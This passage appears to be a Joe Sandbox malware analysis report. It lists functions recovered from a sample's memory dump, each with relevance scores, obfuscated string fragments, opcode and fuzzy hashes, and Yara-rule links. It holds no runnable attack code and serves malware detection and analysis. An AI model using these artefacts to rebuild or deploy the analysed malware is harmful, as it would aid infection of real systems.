                                                                                          • API ID:
                                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                          • API String ID: 0-3248090998
                                                                                          • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                          • Instruction ID: 0f79b5ee837f56c748ae97d6e94a58b4d1222d84e140204717d021956b0c9c1f
                                                                                          • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                          • Instruction Fuzzy Hash: 40910FF08052A98ACB118F55A5603DFBF71BB95304F1581E9C6AA7B243C3BE4E85DF90
                                                                                          Function 05DC6FD5 Relevance: 35.1, Strings: 28, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &";$ ;%5$";&#$";&#$# 5F$#!<5$#;&.$& ";$&#5=$5BZB$5[A5$;%;'$=B|{$Rpv~$Teey$Xzo|$Y95y$^]AX$^|a:$p:!&$pBpw$qzbf$tstg$yyt:$z<5V$|: &$|~p5$}gzx
                                                                                          • API String ID: 0-4206406930
                                                                                          • Opcode ID: 3ff5103dc7ea4982467d40cd215a64eeb51dd8cd0b27d9e7a10fccea9baaab64
                                                                                          • Instruction ID: 511ddcc8373a76ce8e300a5c0ece7b6277a4197989c68cd49c9c263f4801d2e4
                                                                                          • Opcode Fuzzy Hash: 3ff5103dc7ea4982467d40cd215a64eeb51dd8cd0b27d9e7a10fccea9baaab64
                                                                                          • Instruction Fuzzy Hash: C621DDB8C052489ACB14CFD5E9816EDBF74BB05340F20924DE8296F218D3724A82CF95
                                                                                          Function 05DC6FDE Relevance: 35.0, Strings: 28, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &";$ ;%5$";&#$";&#$# 5F$#!<5$#;&.$& ";$&#5=$5BZB$5[A5$;%;'$=B|{$Rpv~$Teey$Xzo|$Y95y$^]AX$^|a:$p:!&$pBpw$qzbf$tstg$yyt:$z<5V$|: &$|~p5$}gzx
                                                                                          • API String ID: 0-4206406930
                                                                                          • Opcode ID: f827f62c810953f89944978c8e7f9e909e1c47e295f8ef2fc20ffa095ba8f3c3
                                                                                          • Instruction ID: 089a420ecdd7663c86e5419b2493450f40879bb222162611d67ab5225443879a
                                                                                          • Opcode Fuzzy Hash: f827f62c810953f89944978c8e7f9e909e1c47e295f8ef2fc20ffa095ba8f3c3
                                                                                          • Instruction Fuzzy Hash: D321CAB4C0524C9BCB14CFD6EA816DDBF74BB05340F20924DE8296F228D3765A82CF99
                                                                                          Function 05DE639E Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                          • API String ID: 0-1002149817
                                                                                          • Opcode ID: 2a786268bd2638d84069e00c302f8b19ba9fcff3cfe5bf4b339c960285849b61
                                                                                          • Instruction ID: a14bbb83f244d16e911cae06c7994159ae834306170adcd50c62964d34ef8099
                                                                                          • Opcode Fuzzy Hash: 2a786268bd2638d84069e00c302f8b19ba9fcff3cfe5bf4b339c960285849b61
                                                                                          • Instruction Fuzzy Hash: 53C12FB1D002689EDB21DFA4CC44BEEBBB9EF45304F0081DAD54CAB241E7B55A88CF61
                                                                                          Function 05DCEE4A Relevance: 28.9, Strings: 23, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !$($.$1E$8Y$9m$?/$Am$J$J<$K$RA$Tj$X$]/$`$`q$a:$lv$r.$z$|$Z
                                                                                          • API String ID: 0-2650000396
                                                                                          • Opcode ID: 05250190e6f74336d32ed9d97ce937aa3900d0b6d25544b931b6c0d107ebe3d9
                                                                                          • Instruction ID: e594424f5c1a1f25b080863519f1fe60453c63b5c389caee9e8ff1f918708026
                                                                                          • Opcode Fuzzy Hash: 05250190e6f74336d32ed9d97ce937aa3900d0b6d25544b931b6c0d107ebe3d9
                                                                                          • Instruction Fuzzy Hash: 4C9108B0D05669CBEB61CF41C9587DEBBB1BB05308F5082D9C55C3B281D7BA1A89CF91
                                                                                          Function 05DE381E Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                          • API String ID: 0-3236418099
                                                                                          • Opcode ID: 67ece800e2634b1d69a49e51c974c697f3e7dd22f628a5a6b4e87dcc82227ff4
                                                                                          • Instruction ID: a8908f0a4f405435ad348a8f595902a9f310d8216a30c49ad22757e9f7cab7bf
                                                                                          • Opcode Fuzzy Hash: 67ece800e2634b1d69a49e51c974c697f3e7dd22f628a5a6b4e87dcc82227ff4
                                                                                          • Instruction Fuzzy Hash: 2D9151B1A01218AAEB21EF95DC85FEEB7BDEF44704F00419EE609A6140EB755B84CF71
                                                                                          Function 05DE381D Relevance: 25.1, Strings: 20, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                          • API String ID: 0-3236418099
                                                                                          • Opcode ID: 6a3639e640838242c09b48c44a37a6038e05d805612203b83c6b9b97288936a2
                                                                                          • Instruction ID: 3d188a801abffb98b88717f7cac556396a8fc4668e939bcdd3f275e08632e3a6
                                                                                          • Opcode Fuzzy Hash: 6a3639e640838242c09b48c44a37a6038e05d805612203b83c6b9b97288936a2
                                                                                          • Instruction Fuzzy Hash: 4841DDB0D0035C9EDB60EF958848BEEBBB9FF05744F50419D950CAA241DBB54B88CF61
                                                                                          Function 05DDF20E Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                          • API String ID: 0-392141074
                                                                                          • Opcode ID: b69eb0ac0b0f71f2e929002a508e9535d7804c7e0d725145f0fc18007d6e63d3
                                                                                          • Instruction ID: a8b84d3c4ddf1b940695bad35c73bd93dc4c6e5be3556ea9842e497d1c70cc3e
                                                                                          • Opcode Fuzzy Hash: b69eb0ac0b0f71f2e929002a508e9535d7804c7e0d725145f0fc18007d6e63d3
                                                                                          • Instruction Fuzzy Hash: F57100B1E10228ABDB25EF94CC45FEEB77DFF08700F04419EE609AA140EB7567448BA5
                                                                                          Function 05DDF206 Relevance: 16.4, Strings: 13, Instructions: 172COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                          • API String ID: 0-392141074
                                                                                          • Opcode ID: f7f8dc4f559ea8e40118069bc81c77286f50d8fbba32bf2aad15e6a81c5e0bcc
                                                                                          • Instruction ID: 5bae3156bccff481de9a4e8a61e75e5dadf64c5f7d645383ebf8a17f8910c0e2
                                                                                          • Opcode Fuzzy Hash: f7f8dc4f559ea8e40118069bc81c77286f50d8fbba32bf2aad15e6a81c5e0bcc
                                                                                          • Instruction Fuzzy Hash: F261F0B1E10218AADB25EF94CC54FEEB77DFF08700F04419EE609AA150EB7557488F65
                                                                                          Function 05DDA53E Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                                          • API String ID: 0-2356907671
                                                                                          • Opcode ID: fac92db289a459b01d7790f1f91f422a406b3c2b39d56cc07e846da2ef0478cd
                                                                                          • Instruction ID: c717dfcbc72c190b9a6686d7af5acddb03a445bc42bd4a398498f920745739e4
                                                                                          • Opcode Fuzzy Hash: fac92db289a459b01d7790f1f91f422a406b3c2b39d56cc07e846da2ef0478cd
                                                                                          • Instruction Fuzzy Hash: 57815EB2D043286ADB51FBE48C84FEE77BDEF54700F04459AA50DAA140EE75A788CB71
                                                                                          Function 05DD3566 Relevance: 13.8, Strings: 11, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                          • API String ID: 0-685823316
                                                                                          • Opcode ID: 210294bd7864810316c741b55769a731cb8bfa3985726f12715ce4572dd5087a
                                                                                          • Instruction ID: c95b2d0b8264dfffe0c66273ca65de30f1b0e117969adac4e228ba9e516f64cc
                                                                                          • Opcode Fuzzy Hash: 210294bd7864810316c741b55769a731cb8bfa3985726f12715ce4572dd5087a
                                                                                          • Instruction Fuzzy Hash: 6E3130B1D51218AAEF50DF94CC45BEEBBB9FB04704F00815DE608BA180DBB556488BB5
                                                                                          Function 05DD356E Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                          • API String ID: 0-685823316
                                                                                          • Opcode ID: d7f0b62c04aacb54df4016b861740aa8efb9d8b80d67a859d19653cf973988a4
                                                                                          • Instruction ID: 3033918002ec35a962fe65dc71cddc8bb059bba2ecb5051e2979ec5afc758e9b
                                                                                          • Opcode Fuzzy Hash: d7f0b62c04aacb54df4016b861740aa8efb9d8b80d67a859d19653cf973988a4
                                                                                          • Instruction Fuzzy Hash: D32141B1D51218AAEF50DFE4CC45BEEBBB9EB04704F00815DE608BA180DBB556488BB5
                                                                                          Function 05DE3CBE Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                          • API String ID: 0-2304485323
                                                                                          • Opcode ID: 42eae43da4bdfec431aa1657d4584bb28f9c8eef669a19345f14d8b1183f81b2
                                                                                          • Instruction ID: 7c3c9513536488f7e181daec4f3089d992ac50b791c5b8e008184754bf9370db
                                                                                          • Opcode Fuzzy Hash: 42eae43da4bdfec431aa1657d4584bb28f9c8eef669a19345f14d8b1183f81b2
                                                                                          • Instruction Fuzzy Hash: BBD1D6B1A04714ABDB90EFE4CC85BEEB7F9EF48600F04451EE509E7240EB79A944CB65
                                                                                          Function 05DE3CBB Relevance: 12.7, Strings: 10, Instructions: 208COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                          • API String ID: 0-2304485323
                                                                                          • Opcode ID: 90517d3de1e91bbb8d8d9c0d4a3cfb7cf4906f1755bd6461cf386572a2e7990b
                                                                                          • Instruction ID: fff436a623fc51c7b4a4f1090492dde6054fef484f9d1580bd96cd6a51b082b3
                                                                                          • Opcode Fuzzy Hash: 90517d3de1e91bbb8d8d9c0d4a3cfb7cf4906f1755bd6461cf386572a2e7990b
                                                                                          • Instruction Fuzzy Hash: 6E81E5B1A04214ABDB50EFE4CC84BEEB7F9EF48300F14451EE509EB240EB79A544CB65
                                                                                          Function 05DE6BEE Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: L$S$\$a$c$e$l
                                                                                          • API String ID: 0-3322591375
                                                                                          • Opcode ID: 713446bbd30631dfd02072ea71f8cd7414598b3bf40696007fa9cfb0b497e774
                                                                                          • Instruction ID: ae13f02bb58eeebe0e7b29c4810d38a9f205907fa3edb79991559e891a4c6534
                                                                                          • Opcode Fuzzy Hash: 713446bbd30631dfd02072ea71f8cd7414598b3bf40696007fa9cfb0b497e774
                                                                                          • Instruction Fuzzy Hash: 4441A972D14218AACB10EF94DC88AEEB7F9FF48710F01455FD51DA7200EB7199858BE0
                                                                                          Function 05DC6EFF Relevance: 8.8, Strings: 7, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )$@JH]$HYYE$H]@F$H_@O$YE@J$d-!cs
                                                                                          • API String ID: 0-49643062
                                                                                          • Opcode ID: 24784860f008106cfe49c478a49f72d12af52efcc30da96e09a19f6e4b2f3fa0
                                                                                          • Instruction ID: 4fd1263a2d7909b417eccb9db1c0f3d66ac373be8f7aef2c8b80820b7085ee93
                                                                                          • Opcode Fuzzy Hash: 24784860f008106cfe49c478a49f72d12af52efcc30da96e09a19f6e4b2f3fa0
                                                                                          • Instruction Fuzzy Hash: 081100B08002A8AACF05DFD49A881DDFFB1BF06718F214158D9687F201E7354A868F91
                                                                                          Function 05DC6F0E Relevance: 8.8, Strings: 7, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )$@JH]$HYYE$H]@F$H_@O$YE@J$d-!cs
                                                                                          • API String ID: 0-49643062
                                                                                          • Opcode ID: 8ae9437ab9ebe834a8cfdddf6ef01b40b6daff7f69d81422c4ae0472bbdcecbb
                                                                                          • Instruction ID: 1a4a02c2a1601198b6bb47064e58a763abe84d2d16ec844c30b4c42bc8f2a728
                                                                                          • Opcode Fuzzy Hash: 8ae9437ab9ebe834a8cfdddf6ef01b40b6daff7f69d81422c4ae0472bbdcecbb
                                                                                          • Instruction Fuzzy Hash: 0A11CDB0C012ACAACF05DFD49A880DDBFB4BB06318F618459D9297F205E7358A869F95
                                                                                          Function 05DDEFDE Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F$P$T$f$r$x
                                                                                          • API String ID: 0-2523166886
                                                                                          • Opcode ID: 55516abe3cc41a7af57b17c756af2bfa9c632ab01534a02a59c750c83ee380ea
                                                                                          • Instruction ID: 0b9979b3ba5d66e27e7bff4e8f1154bc66cf4b1f5986a0c57eb9ebb86f604899
                                                                                          • Opcode Fuzzy Hash: 55516abe3cc41a7af57b17c756af2bfa9c632ab01534a02a59c750c83ee380ea
                                                                                          • Instruction Fuzzy Hash: 0D51B471A05205ABDB34EBA4CD48BEAF7F8FF04744F10465FA50A96180D7B5A588CFB2
                                                                                          Function 05DC6EA5 Relevance: 7.5, Strings: 6, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -!ed$d-!c$d-!cs$f{hq$gm`u$s
                                                                                          • API String ID: 0-3381753496
                                                                                          • Opcode ID: 40f182c2db2f5f5ec8280d567104440b550bd0e91bddab196a13114e9dbca6ec
                                                                                          • Instruction ID: 605ff58fe9cdfe9e2095b1976a1e5155b8d9180458cc8621423345e3422f7cd3
                                                                                          • Opcode Fuzzy Hash: 40f182c2db2f5f5ec8280d567104440b550bd0e91bddab196a13114e9dbca6ec
                                                                                          • Instruction Fuzzy Hash: A201F2B490420E6ACB14EFE8C945AEEBF68FB05304F104699EE5D9B102E731CA45CB96
                                                                                          Function 05DCA2CE Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .$9$<$H$S$Z
                                                                                          • API String ID: 0-2801059568
                                                                                          • Opcode ID: 0bf5c4b8d0c53c640079bc860275fc5d34b790261851eea0833aaad79cd62768
                                                                                          • Instruction ID: 340d88804da470f50946f3a7c66d2ae5b1dd218996317aa3b9ef7b455ebdc2a3
                                                                                          • Opcode Fuzzy Hash: 0bf5c4b8d0c53c640079bc860275fc5d34b790261851eea0833aaad79cd62768
                                                                                          • Instruction Fuzzy Hash: 1711A920D087CED9DB12C6FC88186AEBF715B23224F4883D9D4F42B2D2D2794716D7A6
                                                                                          Function 05DDEFD0 Relevance: 7.5, Strings: 6, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F$P$T$f$r$x
                                                                                          • API String ID: 0-2523166886
                                                                                          • Opcode ID: a921be59a06eef3ed48bfbc33a8098b68c933acee63b9c80428d8baaed3f9cc6
                                                                                          • Instruction ID: 6fab7ee95bd32825a2781e2190ceec8c62723d994d08031978779cd05beb84a5
                                                                                          • Opcode Fuzzy Hash: a921be59a06eef3ed48bfbc33a8098b68c933acee63b9c80428d8baaed3f9cc6
                                                                                          • Instruction Fuzzy Hash: 67012B71D10348AFDB10EFA489192DEBFB6FF41344F01415ED4456B200E7FA5609CB96
                                                                                          Function 05DC6EAE Relevance: 7.5, Strings: 6, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -!ed$d-!c$d-!cs$f{hq$gm`u$s
                                                                                          • API String ID: 0-3381753496
                                                                                          • Opcode ID: 46ebdd3809fbf115d40602fd29f8c99290d743b3f8d4b4729071cb3cca1141d8
                                                                                          • Instruction ID: b3d8fa08d7dea2f40ef9109585294f1d2e1144fd2a1fa31702c2362a907c5a91
                                                                                          • Opcode Fuzzy Hash: 46ebdd3809fbf115d40602fd29f8c99290d743b3f8d4b4729071cb3cca1141d8
                                                                                          • Instruction Fuzzy Hash: F0F0E5B090030C5ACB14EF94C945BDEBBB8EF05304F1040A8DA085B281E3708754CBA6
                                                                                          Function 05DDE72E Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $i$l$o$u
                                                                                          • API String ID: 0-2051669658
                                                                                          • Opcode ID: 009b7bcc5aab4bb7910f7acdcd7248802c611a1bb235c691a25bb90aed694517
                                                                                          • Instruction ID: 0b9426aa39c03cf813cba8ba8c53c65b1dfc18808f302e62263e16698e17f8ff
                                                                                          • Opcode Fuzzy Hash: 009b7bcc5aab4bb7910f7acdcd7248802c611a1bb235c691a25bb90aed694517
                                                                                          • Instruction Fuzzy Hash: B0612FB1A00304AFDB24DBA4CC84FEFB7FDEB88710F14455AE55AA7240E775AA41CB61
                                                                                          Function 05DCA2B5 Relevance: 6.3, Strings: 5, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .$<$H$S$Z
                                                                                          • API String ID: 0-1904692081
                                                                                          • Opcode ID: 30e4a09501ff10839fa75cdc51aa3ac137d160b149bbe4ac6288a5c69a8882d3
                                                                                          • Instruction ID: 5b204c119d51eea86da41484e6f10e8a8dc70149867e332bf5249a18daf89d63
                                                                                          • Opcode Fuzzy Hash: 30e4a09501ff10839fa75cdc51aa3ac137d160b149bbe4ac6288a5c69a8882d3
                                                                                          • Instruction Fuzzy Hash: 8B11FE20D082DED9DB16C7E884543AEFF715F22215F08C2DED4A16B2C2C2794746DB66
                                                                                          Function 05DDE3CE Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $e$k$o
                                                                                          • API String ID: 0-3624523832
                                                                                          • Opcode ID: fe6b404c92718d4d8374b23ee7807c581da27f04d1ff5c8c8d58ef6ef2fa2234
                                                                                          • Instruction ID: 92795bee3f8cf3d2157cbcaef4ab03ec91aaa0f98e128179ab973fe658b76b29
                                                                                          • Opcode Fuzzy Hash: fe6b404c92718d4d8374b23ee7807c581da27f04d1ff5c8c8d58ef6ef2fa2234
                                                                                          • Instruction Fuzzy Hash: 07B10DB5A00704AFDB64DBA4CC84FEFB7FDEF88700F108559F619AB244D674AA418B60
                                                                                          Function 05DDECCE Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $e$h$o
                                                                                          • API String ID: 0-3662636641
                                                                                          • Opcode ID: 6ca4175cfb88fb7c34e2ea33ad4b57b0fb1cffae6cf4e19b9c1dca9f4f4a05d6
                                                                                          • Instruction ID: a11e201bd398107ba982d7bbf66ed839315c9c0fbea6e3675e046052088a6200
                                                                                          • Opcode Fuzzy Hash: 6ca4175cfb88fb7c34e2ea33ad4b57b0fb1cffae6cf4e19b9c1dca9f4f4a05d6
                                                                                          • Instruction Fuzzy Hash: 087155B2A142187EDF65EB94CC88FEFB3BDEF45600F00419AB54996140EE755B848FB2
                                                                                          Function 05DDE28E Relevance: 5.1, Strings: 4, Instructions: 119COMMON
